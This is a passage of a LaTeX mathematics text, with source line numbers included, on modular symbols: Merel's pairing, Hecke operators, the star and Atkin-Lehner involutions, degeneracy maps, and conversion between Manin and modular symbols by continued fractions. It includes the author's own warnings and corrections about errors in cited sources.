\\overline{f(z)}$.\n223\n224\\begin{theorem}[Merel]\\label{thm:perfectpairing}\\index{Merel}\n225There is a pairing\n226\\begin{equation*}\n227 \\langle\\,\\, , \\, \\, \\rangle:\n228 (S_k(N,\\eps)\\oplus \\Sbar_k(N,\\eps)) \\cross \\sM_k(N,\\eps;\\C)\n229 \\ra \\C\n230\\end{equation*}\n231given by\n232$$\\langle f\\oplus g, P\\{\\alp,\\beta\\}\\rangle = 233 \\int_{\\alp}^{\\beta} f(z)P(z,1) dz 234 + \\int_{\\alp}^{\\beta} g(z)P(\\zbar,1) d\\zbar,$$\n235where the path from~$\\alp$ to~$\\beta$ is,\n236except for the endpoints, contained in~$\\h$.\n237The pairing is perfect when restricted to $\\sS_k(N,\\eps;\\C)$.\n238\\end{theorem}\n239\\begin{proof}\n240Take the~$\\eps$ part of each side of~\\cite[Thm.~3]{merel:1585}.\n241\\end{proof}\n242\n243\n244\\section{Linear operators}\n245\\label{sec:heckeops}\n246\\subsection{Hecke operators}\\label{heckeops:modsym}\n247\\index{Hecke operators}\\index{Operators!Hecke}\n248For each positive integer~$n$ and each space~$V$ of modular symbols or modular\n249forms, there is a \\defn{Hecke operator}~$T_n$, which acts\n250as a linear endomorphism of~$V$.\n251For the definition of $T_n$ on modular symbols,\n252see~\\cite[\\S2]{merel:1585}.\n253Alternatively, because we consider only modular symbols\n254with character, the following\n255recipe completely determines the Hecke operators.\n256First, when $n=p$ is prime, we have\n257$$T_p(x) = \\left[ \\mtwo{p}{0}{0}{1} + \\sum_{r \\md p} 258 \\mtwo{1}{r}{0}{p}\\right] x,$$\n259where the first matrix is omitted if $p\\mid N$.\n260If~$m$ and~$n$ are coprime, then $T_{mn} = T_mT_n$.\n261Finally, if~$p$ is a prime, $r\\geq 2$ is an integer,~$\\varepsilon$ is\n262the Dirichlet character of associated to~$V$, and~$k$ is the weight\n263of~$V$, then\n264 $$T_{p^r} = 265 T_p T_{p^{r-1}} - \\varepsilon(p) p^{k-1} T_{p^{r-2}}.$$\n266\n267\\begin{definition}\\index{Hecke algebra|textit}\n268The \\defn{Hecke algebra associated to $V$} is the subring\n269 $$\\T=\\T_V = \\Z[\\ldots T_n \\ldots]$$\n270of $\\End(V)$ generated by all Hecke operators $T_n$, with $n=1,2,3,\\ldots$.\n271\\end{definition}\n272\n273\\begin{proposition}\\label{prop:modsympairing}\n274The pairing of Theorem~\\ref{thm:perfectpairing} respects the\n275action of the Hecke operators\\index{Hecke operators!respect pairing},\n276in the sense that $\\langle f T, x \\rangle = \\langle f , T x \\rangle$\n277for all $T\\in \\T$, $x\\in\\sM_k(N,\\eps)$,\n278 and $f\\in S_k(N,\\eps)\\oplus \\Sbar_k(N,\\eps)$.\n279\\end{proposition}\n280\\begin{proof}\n281See~\\cite[Prop.~10]{merel:1585}.\n282\\end{proof}\n283\n284\\subsection{The $*$-involution}\\label{sec:starinvolution}\n285\\index{Star involution|textit}\\index{Operators!$*$-involution|textit}\n286The matrix $j=\\abcd{-1}{0}{\\hfill0}{1}$ defines\n287an involution~$*$ of $\\sM_k(N,\\eps)$ given by\n288$x\\mapsto x^*=j(x)$. 
Explicitly,\n289\\begin{equation*}\n290(P(X,Y)\\{\\alp,\\beta\\})^* = P(X,-Y)\\{-\\alp,-\\beta\\}.\n291\\end{equation*}\n292Because the space of modular symbols is constructed as a quotient,\n293it is not obvious that the $*$-involution is well defined.%\n294\\index{Star involution!is well defined}\n295\\begin{proposition}\n296The $*$-involution is well defined.\n297\\end{proposition}\n298\\begin{proof}\n299Recall that $\\sM_k(N,\\eps)$ is the largest torsion-free quotient of the\n300free $\\Z[\\eps]$-module generated by symbols\n301$x=P\\{\\alp,\\beta\\}$ by the submodule generated by\n302relations $\\gamma x - \\eps(\\gamma)x$ for\n303all $\\gamma\\in \\Gamma_0(N)$.\n304In order to check that the operator~$*$ is well defined, it\n305suffices to check, for any $x\\in\\sM_k$, that\n306$*(\\gamma x - \\eps(\\gamma)x)$ is of\n307the form $\\gamma' y - \\eps(\\gamma') y$, for some~$y$ in $\\sM_k$.\n308Note that if $\\gamma=\\abcd{a}{b}{c}{d}\\in \\Gamma_0(N)$, then\n309$j\\gamma j^{-1} = \\abcd{\\hfill a}{-b}{-c}{\\hfill d}$ is also in $\\Gamma_0(N)$\n310and $\\eps(j\\gamma j^{-1}) = \\eps(\\gamma)$. We have\n311\\begin{align*}\n312 j(\\gamma x - \\eps(\\gamma) x) &=\n313 j \\gamma x - j \\eps(\\gamma) x \\\\\n314 &= j \\gamma j^{-1} j x - \\eps(\\gamma) j x\\\\\n315 &= (j\\gamma j^{-1}) (j x) - \\eps(j \\gamma j^{-1}) (jx).\n316\\end{align*}\n317\\end{proof}\n318\n319If~$f$ is a modular form\\index{Modular forms}, let $f^*$ be the holomorphic\n320function $\\overline{f(-\\overline{z})}$, where the bar\n321denotes complex conjugation.\n322 The Fourier coefficients\\index{Fourier coefficients}\n323of $f^*$ are the complex conjugates of those of~$f$; though $f^*$\n324is again a holomorphic modular form\\index{Modular forms}, its character\n325is $\\overline{\\eps}$ instead of~$\\eps$.\n326The pairing of Theorem~\\ref{thm:perfectpairing}\n327is the restriction of a pairing on the full spaces without\n328character, and we have the following proposition.\n329\\index{Star involution!and integration pairing}\n330\\begin{proposition}\\label{prop:starpairing}\\footnote{G. Weber pointed\n331out that this isn't correct. 
It is correct if the pairing is replaced\n332by $(f,x) = -2\\pi i\\langle f, x\\rangle$ and $x$ is\n333restricted to modular symbols that are fixed by complex\n334conjugation.}\n335We have\n336\\begin{equation*}\n337\\langle f^*, x^* \\rangle = \\overline{\\langle f, x\\rangle}.\n338\\end{equation*}\n339\\end{proposition}\n340\n341\\begin{definition}[Plus-one quotient]\\index{Plus-one quotient|textit}%\n342\\index{Modular symbols!plus-one quotient of}\n343\\index{Modular symbols!minus-one quotient of}\n344The \\defn{plus-one quotient} $\\sM_k(N,\\eps)_+$ is the\n345largest torsion-free quotient of $\\sM_k(N,\\eps)$ by the relations\n346$x^*-x=0$ for all $x\\in \\sM_k(N,\\eps)$.\n347Similarly, the \\defn{minus-one quotient}\\index{Minus-one quotient}\n348is the quotient of $\\sM_k(N,\\eps)$ by all relations\n349$x^*+x=0$, for $x\\in\\sM_k(N,\\eps)$.\n350\\end{definition}\n351\n352\\begin{warning} We were forced to make\n353a choice in our definition of the operator~$*$.\n354Fortunately, it agrees with that of~\\cite[\\S2.1.3]{cremona:algs},\n355but {\\em not} with the choice made in~\\cite[\\S1.6]{merel:1585}.\n356\\end{warning}\n357\n358\\subsection{The Atkin-Lehner involutions}\\label{sec:atkin-lehner}\n359\\index{Operators!Atkin-Lehner|textit}\n360\\index{Atkin-Lehner involution|textit}\n361In this section we assume\n362that~$k$ is even and $\\eps^2=1$.\n363The assumption on~$\\eps$ is necessary only so that\n364the involution we are about to define preserves\n365$\\sM_k(N,\\eps)$. More generally, it is possible to define\n366a map which sends $\\sM_k(N,\\eps)$ to $\\sM_k(N,\\overline{\\eps})$.\n367\n368To each divisor~$d$ of~$N$ such that $(d,N/d)=1$ there is an\n369\\defn{Atkin-Lehner involution}~$W_d$ of $\\sM_k(N,\\eps)$,\n370which is defined as follows. Using the Euclidean algorithm, choose\n371integers $x,y,z,w$ such that\n372 $$dxw - (N/d)yz = 1.$$\n373Next let $g=\\abcd{dx}{y}{Nz}{dw}$ and define\n374 $$W_d(x) \\define \\frac{1}{d^{\\frac{k-2}{2}}}\\cdot g(x).$$\n375For example, when $d=N$ we have $g=\\abcd{0}{-1}{N}{\\hfill 0}$.\n376The factor of $d^{\\frac{k-2}{2}}$ is necessary to normalize\n377$W_d$ so that it is an involution.\n378\n379On modular forms there is an Atkin-Lehner involution,\n380also denoted $W_d$,\\index{Modular forms!and Atkin-Lehner involution}\n381which acts by $W_d(f) = f|[W_d]_k$. These two like-named involutions\n382are compatible with the integration pairing:\n383$$\\langle W_d(f), x\\rangle = \\langle f, W_d(x)\\rangle.$$\n384\\index{Atkin-Lehner involution!and integration pairing}\n385\n386\\section{Degeneracy maps}\n387\\label{sec:degeneracymaps}\n388\\label{pg:degeneracymaps}\n389\\index{Degeneracy maps}\n390In this section, we describe natural maps between spaces of\n391modular symbols of different levels.\n392\n393Fix a positive integer~$N$ and a Dirichlet\n394character\\index{Dirichlet character}\n395$\\eps : (\\Z/N\\Z)^*\\ra \\C^*$. Let~$M$ be a positive divisor\n396of~$N$ that is divisible by the conductor of~$\\eps$, in the sense\n397that~$\\eps$ factors through $(\\Z/M\\Z)^*$ via the natural map\n398$(\\Z/N\\Z)^*\\ra (\\Z/M\\Z)^*$ composed with some uniquely defined\n399character $\\eps':(\\Z/M\\Z)^*\\ra\\C^*$. 
For any positive divisor~$t$ of\n400$N/M$, let $T=\\abcd{1}{0}{0}{t}$ and fix a choice $D_t=\\{T\\gamma_i : 401i=1,\\ldots, n\\}$ of coset representatives for $\\Gamma_0(N)\\backslash 402T\\Gamma_0(M)$.\n403\n404\\begin{warning}\n405There is a mistake in \\cite[\\S2.6]{merel:1585}:\n406 The quotient $\\Gamma_1(N)\\backslash\\Gamma_1(M)T$'' should be replaced\n407by $\\Gamma_1(N)\\backslash T\\Gamma_1(M)$''.\n408\\end{warning}\n409\\begin{proposition}\n410For each divisor~$t$ of $N/M$ there are well-defined linear maps\n411\\begin{align*}\n413 \\alp_t(x) = (tT^{-1})x = \\mtwo{t}{0}{0}{1} x\\\\\n415 \\beta_t(x) = \\sum_{T\\gam_i\\in D_t} \\eps'(\\gam_i)^{-1}T\\gam_i{} x.\n416\\end{align*}\n417Furthermore,\n418 $\\alp_t\\circ \\beta_t$ is multiplication by\n419 $t^{k-2}\\cdot [\\Gamma_0(M) : \\Gamma_0(N)].$\n420\\end{proposition}\n421\\begin{proof}\n422To show that~$\\alp_t$ is well defined, we must show that for\n423each $x\\in\\sM_k(N,\\eps)$ and $\\gam=\\abcdmat\\in\\Gamma_0(N)$, that we\n424have\n425 $$\\alp_t(\\gamma x -\\eps(\\gamma) x)=0\\in\\sM_k(M,\\eps').$$\n426We have\n427$$\\alp_t(\\gam x) = \\mtwo{t}{0}{0}{1}\\gam x 428 = \\mtwo{a}{tb}{c/t}{d}\\mtwo{t}{0}{0}{1} x 429 = \\eps'(a)\\mtwo{t}{0}{0}{1} x,$$\n430so\n431$$\\alp_t(\\gamma x -\\eps(\\gamma) x) 432 = \\eps'(a)\\alp_t(x) - \\eps(\\gamma)\\alp_t(x) = 0.$$\n433\n434We next verify that~$\\beta_t$ is well defined.\n435Suppose that $x\\in\\sM_k(M,\\eps')$ and $\\gamma\\in\\Gamma_0(M)$;\n436then $\\eps'(\\gam)^{-1}\\gam x = x$, so\n437\\begin{align*}\n438\\beta_t(x)\n439 &= \\sum_{T\\gam_i\\in D_t}\n440 \\eps'(\\gam_i)^{-1}T\\gam_i{}\\eps'(\\gam)^{-1}\\gam{} x\\\\\n441 &= \\sum_{T\\gam_i\\gam\\in D_t}\n442 \\eps'(\\gam_i\\gam)^{-1}T\\gam_i{}\\gam{} x.\n443\\end{align*}\n444This computation shows that the definition of~$\\beta_t$\n445does not depend on the choice~$D_t$ of coset representatives.\n446To finish the proof that~$\\beta_t$ is well defined\n447we must show that, for $\\gam\\in\\Gamma_0(M)$, we have\n448$\\beta_t(\\gam x) = \\eps'(\\gam)\\beta_t(x)$ so that $\\beta_t$\n449respects the relations that define $\\sM_k(M,\\eps)$.\n450Using that~$\\beta_t$ does not depend on the choice of\n451coset representative, we find that for $\\gamma\\in\\Gamma_0(M)$,\n452\\begin{align*}\n453 \\beta_t(\\gam x)\n454 &= \\sum_{T\\gam_i\\in D_t} \\eps'(\\gam_i)^{-1}T\\gam_i{} \\gam{} x\\\\\n455 &= \\sum_{T\\gam_i\\gam^{-1}\\in D_t}\n456 \\eps'(\\gam_i\\gam^{-1})^{-1}T\\gam_i{}\\gam{}^{-1} \\gam{} x\\\\\n457 &= \\eps'(\\gam)\\beta_t(x).\\\\\n458\\end{align*}\n459To compute $\\alp_t\\circ\\beta_t$, we use\n460that $\\#D_t = [\\Gamma_0(N) : \\Gamma_0(M)]$:\n461\\begin{align*}\n462 \\alp_t(\\beta_t(x)) &=\n463 \\alp_t \\left(\\sum_{T\\gamma_i}\n464 \\eps'(\\gam_i)^{-1}T\\gam_i x\\right)\\\\\n465 &= \\sum_{T\\gamma_i}\n466 \\eps'(\\gam_i)^{-1}(tT^{-1})T\\gam_i x\\\\\n467 &= t^{k-2}\\sum_{T\\gamma_i}\n468 \\eps'(\\gam_i)^{-1}\\gam_i x\\\\\n469 &= t^{k-2}\\sum_{T\\gamma_i} x \\\\\n470 &= t^{k-2} \\cdot [\\Gamma_0(N) : \\Gamma_0(M)] \\cdot x.\n471\\end{align*}\n472The scalar factor of $t^{k-2}$ appears instead\n473of~$t$, because~$t$ is acting on~$x$ as an element of $\\GL_2(\\Q)$\n474{\\em not} as an an element of~$\\Q$.\n475\\end{proof}\n476\n477\\begin{definition}[New and old modular symbols]%\n478\\label{def:newandoldsymbols}%\n479\\index{New modular symbols|textit}%\n480\\index{Old modular symbols|textit}%\n481\\index{Modular symbols!new and old subspace of|textit}%\n482The subspace $\\sM_k(N,\\eps)^{\\new}$\n483of \\defn{new modular symbols} is 
the\n484intersection of the kernels of the $\\alp_t$ as~$t$\n485runs through all positive divisors of $N/M$ and~$M$\n486runs through positive divisors of~$M$ strictly less than~$N$\n487and divisible by the conductor of~$\\eps$.\n488The subspace $\\sM_k(N,\\eps)^{\\old}$\n489of \\defn{old modular symbols}\n490is the subspace generated by the images of the $\\beta_t$\n491where~$t$ runs through all positive divisors of $N/M$ and~$M$\n492runs through positive divisors of~$M$ strictly less than~$N$\n493and divisible by the conductor of~$\\eps$.\n494\\end{definition}\n495\n496{\\bf WARNING:} The new and old subspaces need not be disjoint, as\n497the following example illustrates!\n498This is contrary to the statement on page~80 of~\\cite{merel:1585}.\n499\\begin{example}\n500We justify the above warning.\n501Consider, for example, the case $N=6$, $k=2$, and trivial character.\n502The spaces $\\sM_2(2)$ and $\\sM_2(3)$ are each of dimension~$1$, and\n503each is generated by the modular symbol $\\{\\infty,0\\}$.\n504The space $\\sM_2(6)$ is of dimension~$3$, and is generated by\n505the~$3$ modular symbols $\\{\\infty, 0\\}$, $\\{-1/4, 0\\}$,\n506and $\\{-1/2, -1/3\\}$.\n507The space generated by the~$2$ images\n508of $\\sM_2(2)$ under the~$2$ degeneracy\n509maps has dimension~$2$, and likewise for $\\sM_2(3)$.\n510Together these images generate $\\sM_2(6)$, so $\\sM_2(6)$ is\n511equal to its old subspace.\n512However, the new subspace is nontrivial because\n513the two degeneracy maps $\\sM_2(6) \\ra \\sM_2(2)$ are equal,\n514as are the two degeneracy maps $\\sM_2(6) \\ra \\sM_2(3)$.\n515In particular, the intersection of the kernels of the degeneracy\n516maps has dimension at least~$1$ (in fact, it equals~$1$).\n517\n518Computationally, it appears that something similar to this happens\n519if and only if the weight is~$2$, the character is trivial,\n520and the level is composite. This behavior is probably related\n521to the nonexistence of a characteristic~$0$ Eisenstein series\n522of weight~$2$ and level~$1$.\n523\\end{example}\n524\n525The following tempting argument is incorrect;\n526the error lies in the fact that\n527an element of the old subspace\n528is a {\\em linear combination} of $\\beta_t(y)$'s\n529for various~$y$'s and~$t$'s:\n530If~$x$ is in both the new and old subspace,\n531then $x=\\beta_t(y)$ for some modular symbol~$y$\n532of lower level. This implies $x=0$ because\n533 $$0 = \\alp_t(x) = \\alp_t(\\beta_t(y))= 534t^{k-2}\\cdot[\\Gamma_0(N):\\Gamma_0(M)] \\cdot{}y.\\text{''}$$\n535\n536\n537\\begin{remark}\n538The map $\\beta_t\\circ\\alp_t$ cannot in general be multiplication by\n539a scalar since $\\sM_k(M,\\eps')$\n540usually has smaller dimension than $\\sM_k(N,\\eps)$.\n541\\end{remark}\n542\n543\\comment{\n544\\begin{example}\n545The proposition implies that $\\beta_t$ is injective in\n546characteristic~$0$. 
This need not be the case in positive\n547characteristic, as the following example illustrates.\n548Let~$p$ be any prime, and let $\\eps:(\\Z/N\\Z)^* \\ra 549\\Fbar_p^*$ be the reduction to characteristic~$p$\n550of a Dirichlet character.\n551There is again a map $\\beta_{t,p}:\\sM_k(M,\\eps';\\Fbar_p) \\ra 552\\sM_k(N,\\eps;\\Fbar_p)$, where the space $\\sM_k(N,\\eps;\\Fbar_p)$ is\n553defined by choosing a maximal ideal $\\wp$ lying over~$p$ in an\n554appropriate extension $\\O$ of~$\\Z$, and letting~$R=\\Fbar_p$\n555be an algebraic closure of the finite field~$\\O/\\wp$.\n556When~$p$\n557does not divide $t^{k-2}\\cdot [\\Gamma_0(M) : \\Gamma_0(N)]$, the\n558proposition shows that $\\beta_{t,p}$ is injective. However,\n559$\\beta_t\\tensor\\F_p$ need not be injective for all~$p$. For example,\n560suppose $M=14$, $N=28$, and $\\eps=1$. Then there are bases with\n561respect to which the matrix of $\\beta_1$ is the transpose of\n562$$\\left( 563\\begin{matrix} 5641&0&0&1&0&0&0&0&0\\\\ 565 0&1&0&0&1&0&0&0&0\\\\ 566 0&0&1&0&0&1&0&0&0\\\\ 567 0&0&0&0&0&0&2&1&-1\\\\ 568 0&0&0&0&0&0&0&1&1 569\\end{matrix} 570\\right),$$\n571and the row vector $(0,0,0,1,1)$ is in the kernel of the mod~$2$\n572reduction of this matrix.\n573\\end{example}\n574}\n575\n576\\subsection{Computing coset representatives}%\n577\\index{Coset representatives}\n578\\begin{definition}[Projective line mod~$N$]%\n579\\index{Projective line modulo~$N$|textit}%\n580Let~$N$ be a positive integer.\n581Then the \\defn{projective line}\n582$\\P^1(N)$ is the set of\n583pairs $(a,b)$, with $a, b\\in\\Z/N\\Z$ and $\\gcd(a,b,N)=1$, modulo\n584the eqivalence relation which identifies $(a,b)$ and $(a',b')$ if and only\n585if $ab'\\con ba'\\pmod{N}$.\n586\\end{definition}\n587\n588Let~$M$ be a positive divisor of~$N$ and~$t$ a\n589divisor of~$N/M$. The following {\\em random} algorithm\n590computes a set~$D_t$ of representatives for the orbit space\n591$\\Gamma_0(M)\\backslash T\\Gamma_0(N).$\n592There are deterministic algorithms for computing\n593$D_t$, but all of the ones the author has found are\n594{\\em vastly} less efficient than the following random algorithm.\n595\\begin{algorithm}\\label{alg:degenreps}%\n596\\index{Algorithm for computing!coset representatives}\n597 Let $\\Gamma_0(N/t,t)$ denote the subgroup of $\\SL_2(\\Z)$\n598consisting of matrices that are upper triangular modulo $N/t$ and lower\n599triangular modulo~$t$. 
Observe that two right cosets\n600 of $\\Gamma_0(N/t,t)$ in $\\SL_2(\\Z)$, represented by\n601$\\abcd{a}{b}{c}{d}$ and $\\abcd{a'}{b'}{c'}{d'}$,\n602are equivalent if and only if\n603$(a,b)=(a',b')$ as points of $\\P^1(t)$\n604and $(c,d)=(c',d')$ as points of $\\P^1(N/t)$.\n605Using the following algorithm, we compute right coset\n606representatives for $\\Gamma_0(N/t,t)$\n607inside~$\\Gamma_0(M)$.\n608\\begin{enumerate}\n609 \\item Compute the number $[\\Gamma_0(M):\\Gamma_0(N)]$ of cosets.\n610 \\item Compute a random element $x \\in \\Gamma_0(M)$.\n611 \\item If~$x$ is not equivalent to anything generated so\n612 far, add it to the list.\n613 \\item Repeat steps (2) and (3) until the list is as long\n614 as the bound of step (1).\n615\\end{enumerate}\n616There is a natural bijection between\n617 $\\Gamma_0(N)\\backslash T \\Gamma_0(M)$\n618and $\\Gamma_0(N/t,t)\\backslash \\Gamma_0(M)$,\n619under which~$T\\gamma$ corresponds to~$\\gamma$.\n620Thus we obtain coset representatives for\n621 $\\Gamma_0(N)\\backslash T\\Gamma_0(M)$\n622by left multiplying each\n623coset representative of $\\Gamma_0(N/t,t)\\backslash\\Gamma_0(M)$ by~$T$.\n624\\end{algorithm}\n625\n626\\subsection{Compatibility with modular forms}%\n627\\index{Degeneracy maps!compatibility}%\n628The degeneracy maps defined above\n629are compatible with the corresponding degeneracy maps\n630$\\tilde{\\alp}_t$ and $\\tilde{\\beta}_t$\n631on modular forms\\index{Modular forms}. This is because the degeneracy\n632maps on modular forms are defined by summing over the\n633same coset representatives $D_t$.\n634Thus we have the following compatibilities.\n635\\begin{align*}\n636 \\langle \\tilde{\\alp}_t(f), x \\rangle &= \\langle f, \\alp_t(x)\\rangle,\\\\\n637 \\langle \\tilde{\\beta}_t(f), x\\rangle &= \\langle f, \\beta_t(x) \\rangle .\n638\\end{align*}\n639If~$p$ is prime to~$N$, then $T_p\\alp_t = \\alp_t T_p$\n640 and $T_p\\beta_t = \\beta_t T_p$.\n641\n642\\section{Manin symbols}%\n643\\label{sec:maninsymbols}%\n644\\index{Manin symbols}%\n645From the definition given in\n646Section~\\ref{sec:defnofmodsyms}, it is not obvious\n647that $\\sM_k(N,\\eps)$ is of finite rank. The Manin\n648symbols provide a finite presentation of~$\\sM_k(N,\\eps)$\n649that is vastly more useful from a computational point of view.\n650\\index{Modular symbols!finite presentation of}\n651\n652\\begin{definition}[Manin symbols]\\label{defn:maninsymbols}%\n653\\index{Manin symbols|textit}%\n654The \\defn{Manin symbols} are the set of pairs\n655 $$[P(X,Y),(u,v)]$$\n656where $P(X,Y)\\in V_{k-2}$ and\n657$0\\leq u,v < N$ with $\\gcd(u,v,N)=1$.\n658\\end{definition}\n659Define a {\\em right} action of $\\GL_2(\\Q)$ on\n660the free $\\Z[\\eps]$-module~$M$ generated by the Manin\n661symbols as follows. 
The element $g=\\abcd{a}{b}{c}{d}$ acts by\n662\\begin{equation*}\n663[P,(u,v)]g=[g^{-1}P(X,Y),(u,v) g]\n664 = [P(aX+bY,cX+dY),(au+cv,bu+dv)].\n665\\end{equation*}\n666Let $\\sigma=\\abcd{0}{-1}{1}{\\hfill 0}$ and $\\tau=\\abcd{0}{-1}{1}{-1}$\\label{defn:sigmatau}.\n667Let $\\sM_k(N,\\eps)'$ be the largest torsion-free quotient\n668of~$M$ by the relations\n669\\begin{align*}\n670\\mbox{}x + x\\sigma &= 0,\\\\\n671\\mbox{}x + x\\tau+ x\\tau^2 &= 0,\\\\\n672 \\eps(\\lambda) [P,(u,v)]- [P,(\\lambda u, \\lambda v)] &=0.\n673\\end{align*}\n674\n675\\begin{theorem}\\label{thm:maninsymbols}\n676There is a natural isomorphism\n677$\\vphi:\\sM_k(N,\\eps)'\\lra\\sM_k(N,\\eps)$ given by\n678$$[X^iY^{2-k-i},(u,v)] \\mapsto g(X^iY^{k-2-i}\\{ 0,\\infty\\})$$\n679where $g=\\abcd{a}{b}{c}{d}\\in\\SL_2(\\Z)$ is any matrix\n680such that $(u,v)\\con (c,d) \\pmod{N}$.\n681\\end{theorem}\n682\\begin{proof}\n683In~\\cite[\\S1.2, \\S1.7]{merel:1585} it is proved that\n684$\\vphi\\tensor_{\\Z[\\eps]}\\C$ is\n685an isomorphism, so~$\\vphi$ is injective and well defined.\n686The discussion in Section~\\ref{sec:modmanconv} below\n687(Manin's trick'')\\index{Manin's trick}\\index{Manin symbols!and Manin's trick}\n688shows that every element in $\\sM_k(N,\\eps)$ is a $\\Z[\\eps]$-linear\n689combination of elements in the image, so~$\\vphi$ is surjective as well.\n690\\end{proof}\n691\n692\\subsection{Conversion between modular and Manin symbols}%\n693\\index{Manin symbols!conversion to modular symbols}%\n694\\index{Modular symbols!conversion to Manin symbols}%\n695\\label{sec:modmanconv}%\n696For some purposes it is better to work with modular symbols, and for\n697others it is better to work with Manin symbols. For example, there\n698are descriptions of the Atkin-Lehner involution\\index{Atkin-Lehner involution}\n699in terms of both Manin\n700and modular symbols; it appears more efficient to compute this\n701involution using modular symbols. On the other hand, practically\n702Hecke operators can be computed more efficiently using Manin symbols.\n703It is thus essential to be able to convert between these two\n704representations. The conversion from Manin to modular symbols is\n705straightforward, and follows immediately from\n706Theorem~\\ref{thm:maninsymbols}. The conversion back is accomplished\n707using the method used to prove Theorem~\\ref{thm:maninsymbols}; it is\n708known as Manin's trick'',\\index{Manin's trick|textit}\\index{Manin!trick of|textit} and involves continued fractions\\index{Continued fractions}.\n709\n710Given a Manin symbol $[X^iY^{k-2-i},(u,v)]$\\index{Manin symbols},\n711we write down a corresponding modular symbol\\index{Modular symbols}\n712as follows.\n713Choose $\\abcd{a}{b}{c}{d}\\in\\SL_2(\\Z)$ such that\n714$(c,d)\\con (u,v)\\pmod{N}$. This is possible\n715by Lemma~1.38 of~\\cite[pg.~20]{shimura:intro}; in practice,\n716finding $\\abcd{a}{b}{c}{d}$ is not completely trivial, but\n717can be accomplished using the extended Euclidean\n718algorithm.\n719Then\n720 \\begin{eqnarray*}\n721 [X^iY^{k-2-i},(u,v)] &\\corrto&\n722 \\abcd{a}{b}{c}{d}(X^iY^{k-2-i}\\{ 0,\\infty\\})\\\\\n723 &&= (dX-bY)^i(-cX+aY)^{2-k-i}\n724 \\left\\{\\frac{b}{d},\\,\\frac{a}{c}\\right\\}.\\\\\n725\\end{eqnarray*}\n726\n727In the other direction, suppose that we are given a modular\n728symbol $P(X,Y)\\{\\alp,\\beta\\}$ and wish to represent it as a\n729sum of Manin symbols. 
Because\n730 $$P\\{a/b,c/d\\} = P\\{a/b,0\\}+P\\{0,c/d\\},$$\n731it suffices to write $P\\{0,a/b\\}$ in\n732terms of Manin symbols.\n733Let\n734$$0=\\frac{p_{-2}}{q_{-2}} = \\frac{0}{1},\\,\\, 735\\frac{p_{-1}}{q_{-1}}=\\frac{1}{0},\\,\\, 736\\frac{p_0}{1}=\\frac{p_0}{q_0},\\,\\, 737\\frac{p_1}{q_1},\\,\\, 738\\frac{p_2}{q_2},\\,\\ldots,\\,\\frac{p_r}{q_r}=\\frac{a}{b}$$\n739denote the continued fraction convergents of the\n740rational number $a/b$.\n741Then\n742$$p_j q_{j-1} 743 - p_{j-1} q_j = (-1)^{j-1}\\qquad \\text{for }-1\\leq j\\leq r.$$\n744If we let\n745$g_j = \\mtwo{(-1)^{j-1}p_j}{p_{j-1}}{(-1)^{j-1}q_j}{q_{j-1}}$,\n746then $g_j\\in\\sltwoz$ and\n747\\begin{align*}\n748 P(X,Y)\\{0,a/b\\}\n749 &=P(X,Y)\\sum_{j=-1}^{r}\\left\\{\\frac{p_{j-1}}{q_{j-1}},\\frac{p_j}{q_j}\\right\\}\\\\\n750 &=\\sum_{j=-1}^{r} g_j((g_j^{-1}P(X,Y))\\{0,\\infty\\})\\\\\n751 &=\\sum_{j=-1}^{r} [g_j^{-1}P(X,Y),((-1)^{j-1}q_j,q_{j-1})].\n752\\end{align*}\n753Note that in the $j$th summand, $g_j^{-1}P(X,Y)$, replaces $P(X,Y)$.\n754Since $g_j\\in\\sltwoz$ and $P(X,Y)$ has integer coefficients,\n755the polynomial $g_j^{-1}P(X,Y)$ also has integer coefficients,\n756so no denominators are introduced.\n757\n758The continued fraction expansion $[c_1,c_2,\\ldots,c_n]$\n759of the rational number $a/b$ can be computed\n760using the Euclidean algorithm.\n761The first term, $c_1$, is the quotient'': $a = bc_1+r$,\n762with $0\\leq r < b$.\n763Let $a'=b$, $b'=r$ and compute $c_2$ as\n764$a'=b'c_2+r'$, etc., terminating when the\n765remainder is $0$. For example, the expansion\n766of $5/13$ is $[0,2,1,1,2]$.\n767The numbers $$d_i=c_1+\\frac{1}{c_2+\\frac{1}{c_3+\\cdots}}$$\n768will then be the (finite) convergents.\n769For example if $a/b=5/13$, then the convergents are\n770 $$0/1,\\,\\, 1/0,\\,\\, d_1=0,\\,\\, d_2=\\frac{1}{2},\\,\\, d_3=\\frac{1}{3},\\,\\, 771 d_4=\\frac{2}{5},\\,\\, d_5=\\frac{5}{13}.$$\n772\n773\n774\n775\\subsection{Hecke operators on Manin symbols}%\n776\\index{Hecke operators!on Manin symbols}%\n777\\index{Manin symbols!and Hecke operators}%\n778\\label{subsec:heckeonmanin}%\n779Thoerem~2 of \\cite{merel:1585} gives a description of\n780the Hecke operators~$T_n$\n781directly on the space of Manin symbols.\n782This avoids the expense of first converting a Manin\n783symbol to a modular symbol, computing~$T_n$ on the modular symbol,\n784and then converting back. 
For the reader's convenience, we very\n785briefly recall Merel's\\index{Merel} theorem here, along with\n786an enhancement due to Cremona\\index{Cremona}.\n787\n788As in~\\cite[\\S2.4]{cremona:algs}, define~$R_p$ as follows.\n789When $p=2$,\n790$$R_2 := \\left\\{\\mtwo{1}{0}{0}{2}, 791 \\mtwo{2}{0}{0}{1}, \\mtwo{2}{1}{0}{1}, 792 \\mtwo{1}{0}{1}{2}\\right\\}.$$\n793When~$p$ is odd,~$R_p$ is the set of $2\\times 2$ integer\n794matrices $\\abcd{a}{b}{c}{d}$ with determinant~$p$, and either\n795\\begin{enumerate}\n796\\item $a>|b|>0$, $d>|c|>0$, and $bc<0$; or\n797\\item $b=0$, and $|c|<d/2$; or\n798\\item $c=0$, and $|b|<a/2$.\n799\\end{enumerate}\n800\\begin{proposition}\n801For $[P(X,Y),(u,v)]\\in\\sM_k(N,\\eps)$ and~$p$ a prime, we have\n802\\begin{align*}T_p([P(X,Y),(u,v)])\n803 &= \\sum_{g\\in R_p} [P(X,Y),(u,v)].g \\\\\n804 &= \\sum_{\\abcd{a}{b}{c}{d}\\in R_p} [P(aX+bY,cX+dY),(au+cv,bu+dv)],\n805\\end{align*}\n806where the sum is restricted to matrices $\\abcd{a}{b}{c}{d}$\n807such that $\\gcd(au+cv,bu+dv,N)=1$.\n808\\end{proposition}\n809\\begin{proof}\n810For the case $k=2$ and an algorithm to compute $R_p$,\n811see \\cite[\\S2.4]{cremona:algs}.\n812The general case follows from~\\cite[Theorem 2]{merel:1585} applied\n813to the set~$\\sS$ of~\\cite[\\S3]{merel:1585} by observing that\n814when~$p$ is an odd {\\em prime} $\\sS_p'$ is empty.\n815\\end{proof}\n816\n817\\subsection{The cuspidal and boundary spaces in terms of 